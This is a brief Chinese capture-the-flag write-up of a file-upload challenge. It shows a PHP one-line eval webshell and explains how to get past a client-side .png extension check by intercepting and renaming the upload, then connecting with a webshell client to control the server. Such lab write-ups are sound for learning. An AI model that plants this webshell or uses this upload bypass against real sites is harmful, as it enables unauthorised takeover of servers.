根据题目这是一道文件上传相关题目,我们先查看源代码看看有什么信息
这里说明只允许上传以png结尾的文件那么我们构造一个一句话木马但是以.png为后缀来绕过前端验证
构造的payload为: <?php @eval($_POST['attack']);?>
密码为:attack
然后将文件命名为:文件名.png后上传文件同时打开bp抓包
将后缀重新改为.php文件就以.php的形式上传成功所以我们可以使用蚁剑连接
要注意我们需要将https改为http才能成功连接,接下来我们就掌握了该网站的控制权
最后发现flag在:/var/www/html/flag.php目录下
